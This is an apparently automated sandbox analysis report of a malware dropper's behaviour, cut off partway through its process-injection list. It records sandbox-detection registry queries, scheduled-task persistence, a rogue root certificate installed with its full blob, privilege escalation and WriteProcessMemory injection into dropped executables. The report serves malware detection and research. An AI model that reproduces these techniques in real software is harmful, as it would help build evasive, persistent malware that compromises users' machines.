Processor information is often read in order to detect sandboxing environments.
Processes:
sJfF7bgkUqNIFOBVdgKnJ3Rj.exeO9DHgLkl0NUvjFCrxs7X4Nwz.exeir75MsIvsiG7rQAfaFb5x56i.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 O9DHgLkl0NUvjFCrxs7X4Nwz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString O9DHgLkl0NUvjFCrxs7X4Nwz.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ir75MsIvsiG7rQAfaFb5x56i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ir75MsIvsiG7rQAfaFb5x56i.exe -
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1052 schtasks.exe 3116 schtasks.exe 5264 schtasks.exe 948 schtasks.exe 5584 schtasks.exe 5388 schtasks.exe 5292 schtasks.exe 248 schtasks.exe 3064 schtasks.exe 4320 schtasks.exe 5916 schtasks.exe 1380 schtasks.exe 4824 schtasks.exe 2288 schtasks.exe 3852 schtasks.exe 952 schtasks.exe 6080 schtasks.exe 4912 schtasks.exe 6084 schtasks.exe 5848 schtasks.exe 4236 schtasks.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
Processes:
Install.exechrome.exerundll32.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeH06PndcrWiIaVx5PSdNTfHA2.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exevrXeRMO.exeInstall.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vrXeRMO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{bdd0c00a-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" H06PndcrWiIaVx5PSdNTfHA2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" H06PndcrWiIaVx5PSdNTfHA2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" H06PndcrWiIaVx5PSdNTfHA2.exe -
Processes:
RegAsm.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
BkPeq6sStPIJt6eQzR9iKjCJ.exeUiDDocf0sy_A_v4KXEF0FUfY.exenW4waGBVRtQJr0IGyv9rf_uR.exesJfF7bgkUqNIFOBVdgKnJ3Rj.exe21TYPfMnkkSbr5d7azCiFo2v.exechrome.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exedckuybanmlgp.exepid process 4608 BkPeq6sStPIJt6eQzR9iKjCJ.exe 4608 BkPeq6sStPIJt6eQzR9iKjCJ.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 2956 nW4waGBVRtQJr0IGyv9rf_uR.exe 2956 nW4waGBVRtQJr0IGyv9rf_uR.exe 424 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe 424 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 3020 chrome.exe 3020 chrome.exe 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 3452 RegAsm.exe 3452 RegAsm.exe 5636 powershell.exe 5636 powershell.exe 5636 powershell.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 3452 RegAsm.exe 664 powershell.exe 664 powershell.exe 664 powershell.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 3744 dckuybanmlgp.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
chrome.exechrome.exepid process 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
UiDDocf0sy_A_v4KXEF0FUfY.exechrome.exepowershell.exeRegAsm.exepowershell.exeWMIC.exepowershell.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeDebugPrivilege 3452 RegAsm.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeDebugPrivilege 5636 powershell.exe Token: SeIncreaseQuotaPrivilege 5760 WMIC.exe Token: SeSecurityPrivilege 5760 WMIC.exe Token: SeTakeOwnershipPrivilege 5760 WMIC.exe Token: SeLoadDriverPrivilege 5760 WMIC.exe Token: SeSystemProfilePrivilege 5760 WMIC.exe Token: SeSystemtimePrivilege 5760 WMIC.exe Token: SeProfSingleProcessPrivilege 5760 WMIC.exe Token: SeIncBasePriorityPrivilege 5760 WMIC.exe Token: SeCreatePagefilePrivilege 5760 WMIC.exe Token: SeBackupPrivilege 5760 WMIC.exe Token: SeRestorePrivilege 5760 WMIC.exe Token: SeShutdownPrivilege 5760 WMIC.exe Token: SeDebugPrivilege 5760 WMIC.exe Token: SeSystemEnvironmentPrivilege 5760 WMIC.exe Token: SeRemoteShutdownPrivilege 5760 WMIC.exe Token: SeUndockPrivilege 5760 WMIC.exe Token: SeManageVolumePrivilege 5760 WMIC.exe Token: 33 5760 WMIC.exe Token: 34 5760 WMIC.exe Token: 35 5760 WMIC.exe Token: 36 5760 WMIC.exe Token: SeIncreaseQuotaPrivilege 5760 WMIC.exe Token: SeSecurityPrivilege 5760 WMIC.exe Token: SeTakeOwnershipPrivilege 5760 WMIC.exe Token: SeLoadDriverPrivilege 5760 WMIC.exe Token: SeSystemProfilePrivilege 5760 WMIC.exe Token: SeSystemtimePrivilege 5760 WMIC.exe Token: SeProfSingleProcessPrivilege 5760 WMIC.exe Token: SeIncBasePriorityPrivilege 5760 WMIC.exe Token: SeCreatePagefilePrivilege 5760 WMIC.exe Token: SeBackupPrivilege 5760 WMIC.exe Token: SeRestorePrivilege 5760 WMIC.exe Token: SeShutdownPrivilege 5760 WMIC.exe Token: SeDebugPrivilege 5760 WMIC.exe Token: SeSystemEnvironmentPrivilege 5760 WMIC.exe Token: SeRemoteShutdownPrivilege 5760 WMIC.exe Token: SeUndockPrivilege 5760 WMIC.exe Token: SeManageVolumePrivilege 5760 WMIC.exe Token: 33 5760 WMIC.exe Token: 34 5760 WMIC.exe Token: 35 5760 WMIC.exe Token: 36 5760 WMIC.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeShutdownPrivilege 3020 chrome.exe Token: SeCreatePagefilePrivilege 3020 chrome.exe Token: SeDebugPrivilege 664 powershell.exe Token: SeShutdownPrivilege 5652 powercfg.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
Processes:
chrome.exechrome.exepid process 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exechrome.exepid process 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 3020 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe 2776 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
O9DHgLkl0NUvjFCrxs7X4Nwz.exepid process 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1714588385.7011812_setup.exexMZwwEzPK44PSgfAXefyTRer.exeBTgSRN4g3JmlVuYdJeoWlWRy.exerN5PhBPG1JLMbW1HxIHs3JRl.exedescription pid process target process PID 2964 wrote to memory of 5100 2964 1714588385.7011812_setup.exe H06PndcrWiIaVx5PSdNTfHA2.exe PID 2964 wrote to memory of 5100 2964 1714588385.7011812_setup.exe H06PndcrWiIaVx5PSdNTfHA2.exe PID 2964 wrote to memory of 5100 2964 1714588385.7011812_setup.exe H06PndcrWiIaVx5PSdNTfHA2.exe PID 2964 wrote to memory of 2956 2964 1714588385.7011812_setup.exe nW4waGBVRtQJr0IGyv9rf_uR.exe PID 2964 wrote to memory of 2956 2964 1714588385.7011812_setup.exe nW4waGBVRtQJr0IGyv9rf_uR.exe PID 2964 wrote to memory of 2956 2964 1714588385.7011812_setup.exe nW4waGBVRtQJr0IGyv9rf_uR.exe PID 2964 wrote to memory of 1160 2964 1714588385.7011812_setup.exe 21TYPfMnkkSbr5d7azCiFo2v.exe PID 2964 wrote to memory of 1160 2964 1714588385.7011812_setup.exe 21TYPfMnkkSbr5d7azCiFo2v.exe PID 2964 wrote to memory of 2144 2964 1714588385.7011812_setup.exe xMZwwEzPK44PSgfAXefyTRer.exe PID 2964 wrote to memory of 2144 2964 1714588385.7011812_setup.exe xMZwwEzPK44PSgfAXefyTRer.exe PID 2964 wrote to memory of 2144 2964 1714588385.7011812_setup.exe xMZwwEzPK44PSgfAXefyTRer.exe PID 2964 wrote to memory of 4784 2964 1714588385.7011812_setup.exe BTgSRN4g3JmlVuYdJeoWlWRy.exe PID 2964 wrote to memory of 4784 2964 1714588385.7011812_setup.exe BTgSRN4g3JmlVuYdJeoWlWRy.exe PID 2964 wrote to memory of 4784 2964 1714588385.7011812_setup.exe BTgSRN4g3JmlVuYdJeoWlWRy.exe PID 2964 wrote to memory of 2344 2964 1714588385.7011812_setup.exe ypy5d_A5K61R6kYnPCE2aQ44.exe PID 2964 wrote to memory of 2344 2964 1714588385.7011812_setup.exe ypy5d_A5K61R6kYnPCE2aQ44.exe PID 2964 wrote to memory of 2344 2964 1714588385.7011812_setup.exe ypy5d_A5K61R6kYnPCE2aQ44.exe PID 2964 wrote to memory of 1672 2964 1714588385.7011812_setup.exe rN5PhBPG1JLMbW1HxIHs3JRl.exe PID 2964 wrote to memory of 1672 2964 1714588385.7011812_setup.exe rN5PhBPG1JLMbW1HxIHs3JRl.exe PID 2964 wrote to memory of 1672 2964 1714588385.7011812_setup.exe rN5PhBPG1JLMbW1HxIHs3JRl.exe PID 2964 wrote to memory of 3544 2964 1714588385.7011812_setup.exe ir75MsIvsiG7rQAfaFb5x56i.exe PID 2964 wrote to memory of 3544 2964 1714588385.7011812_setup.exe ir75MsIvsiG7rQAfaFb5x56i.exe PID 2964 wrote to memory of 3544 2964 1714588385.7011812_setup.exe ir75MsIvsiG7rQAfaFb5x56i.exe PID 2964 wrote to memory of 2704 2964 1714588385.7011812_setup.exe O9DHgLkl0NUvjFCrxs7X4Nwz.exe PID 2964 wrote to memory of 2704 2964 1714588385.7011812_setup.exe O9DHgLkl0NUvjFCrxs7X4Nwz.exe PID 2964 wrote to memory of 2704 2964 1714588385.7011812_setup.exe O9DHgLkl0NUvjFCrxs7X4Nwz.exe PID 2964 wrote to memory of 4508 2964 1714588385.7011812_setup.exe _nmI4eGVgzjJ4g_Ia4tRhBBX.exe PID 2964 wrote to memory of 4508 2964 1714588385.7011812_setup.exe _nmI4eGVgzjJ4g_Ia4tRhBBX.exe PID 2964 wrote to memory of 4508 2964 1714588385.7011812_setup.exe _nmI4eGVgzjJ4g_Ia4tRhBBX.exe PID 2964 wrote to memory of 424 2964 1714588385.7011812_setup.exe sJfF7bgkUqNIFOBVdgKnJ3Rj.exe PID 2964 wrote to memory of 424 2964 1714588385.7011812_setup.exe sJfF7bgkUqNIFOBVdgKnJ3Rj.exe PID 2964 wrote to memory of 424 2964 1714588385.7011812_setup.exe sJfF7bgkUqNIFOBVdgKnJ3Rj.exe PID 2964 wrote to memory of 4608 2964 1714588385.7011812_setup.exe BkPeq6sStPIJt6eQzR9iKjCJ.exe PID 2964 wrote to memory of 4608 2964 1714588385.7011812_setup.exe BkPeq6sStPIJt6eQzR9iKjCJ.exe PID 2964 wrote to memory of 4608 2964 1714588385.7011812_setup.exe BkPeq6sStPIJt6eQzR9iKjCJ.exe PID 2964 wrote to memory of 4916 2964 1714588385.7011812_setup.exe UiDDocf0sy_A_v4KXEF0FUfY.exe PID 2964 wrote to memory of 4916 2964 1714588385.7011812_setup.exe UiDDocf0sy_A_v4KXEF0FUfY.exe PID 2144 wrote to memory of 1456 2144 xMZwwEzPK44PSgfAXefyTRer.exe xMZwwEzPK44PSgfAXefyTRer.tmp PID 2144 wrote to memory of 1456 2144 xMZwwEzPK44PSgfAXefyTRer.exe xMZwwEzPK44PSgfAXefyTRer.tmp PID 2144 wrote to memory of 1456 2144 xMZwwEzPK44PSgfAXefyTRer.exe xMZwwEzPK44PSgfAXefyTRer.tmp PID 4784 wrote to memory of 728 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 728 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 728 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 1672 wrote to memory of 2092 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 2092 1672 